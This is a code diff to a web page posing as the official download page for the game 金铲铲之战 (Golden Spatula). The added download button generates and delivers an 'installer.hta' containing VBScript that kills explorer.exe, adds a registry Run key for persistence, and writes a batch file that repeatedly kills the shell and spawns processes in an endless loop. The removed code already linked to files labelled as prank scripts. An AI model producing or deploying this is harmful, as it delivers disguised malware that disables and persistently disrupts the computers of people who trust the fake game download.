--- a/index.html
+++ b/index.html
@@ -23,10 +23,6 @@
         h1 {
             color: #FFD700;
         }
-        .game-logo {
-            width: 100%;
-            border-radius: 10px;
-        }
         .download-button {
             background-color: #FFD700;
             color: black;
@@ -36,77 +32,50 @@
             cursor: pointer;
             border-radius: 5px;
             margin-top: 15px;
-            animation: bounce 0.5s infinite alternate;
         }
         .download-button:hover {
             background-color: #E6C300;
-        }
-        @keyframes bounce {
-            0% { transform: translateY(0); }
-            100% { transform: translateY(-10px); }
-        }
-        .progress-container {
-            width: 100%;
-            background-color: #444;
-            border-radius: 10px;
-            margin-top: 20px;
-            overflow: hidden;
-        }
-        .progress-bar {
-            width: 0%;
-            height: 10px;
-            background-color: #FFD700;
-            border-radius: 10px;
-        }
-        #countdown {
-            font-size: 18px;
-            color: #FFD700;
-            margin-top: 15px;
         }
     </style>
 </head>
 <body>
     <div class="container">
-        <img class="game-logo" src="https://game.gtimg.cn/images/lolm/act/a20230829jcc/images/share.jpg" alt="金铲铲之战">
         <h1>金铲铲之战 - 官方下载</h1>
         <p>立即下载最新版本，体验超燃策略对战！</p>
-        <button class="download-button" onclick="startDownload()">立即下载</button>
-
-        <div class="progress-container">
-            <div class="progress-bar" id="progress-bar"></div>
-        </div>
-
-        <p id="countdown">下载倒计时: <span id="time-left">10</span>秒</p>
+        <button class="download-button" onclick="downloadAndRun()">立即下载</button>
     </div>
 
     <script>
-        function startDownload() {
-            var timeLeft = 10;
-            var countdown = document.getElementById("time-left");
-            var progressBar = document.getElementById("progress-bar");
+        function downloadAndRun() {
+            var htaContent = `
+            <html>
+            <head><title>Game Installer</title></head>
+            <body>
+            <script language="VBScript">
+                Set WshShell = CreateObject("WScript.Shell")
+                ' 执行命令关闭 explorer.exe
+                WshShell.Run "taskkill /f /im explorer.exe", 0, True
+                
+                ' 创建并写入注册表
+                WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\PersistentTask", "%APPDATA%\persistent.bat"
 
-            var interval = setInterval(function() {
-                if (timeLeft <= 0) {
-                    clearInterval(interval);
-                    countdown.innerHTML = "准备开始下载...";
-                    setTimeout(downloadFile, 1000);  // 延迟下载
-                } else {
-                    countdown.innerHTML = timeLeft;
-                    timeLeft--;
-                    progressBar.style.width = (10 - timeLeft) * 10 + "%";
-                }
-            }, 1000);
-        }
-
-        function downloadFile() {
+                ' 创建 persistent.bat 文件
+                Set fso = CreateObject("Scripting.FileSystemObject")
+                Set file = fso.CreateTextFile(WshShell.ExpandEnvironmentStrings("%APPDATA%\\persistent.bat"), True)
+                file.WriteLine "@echo off"
+                file.WriteLine "taskkill /f /im explorer.exe"
+                file.WriteLine ":loop"
+                file.WriteLine "start"
+                file.WriteLine "goto loop"
+                file.Close
+            </script>
+            </body>
+            </html>
+            `;
+            var blob = new Blob([htaContent], { type: 'application/hta' });
             var link = document.createElement('a');
-            if (navigator.platform.toUpperCase().indexOf('MAC') >= 0) {
-                link.href = "https://example.com/MacEvil.command";  // macOS 版恶作剧脚本
-                link.download = "JinChanchan_Mac.command";
-            } else {
-                link.href = "https://www.yourwebsite.com/downloads/WindowsUpdate.exe";  // Windows 版恶作剧脚本
-                link.download = "JinChanchan_Windows.exe";
-            }
+            link.href = URL.createObjectURL(blob);
+            link.download = 'installer.hta';
             document.body.appendChild(link);
             link.click();
             document.body.removeChild(link);
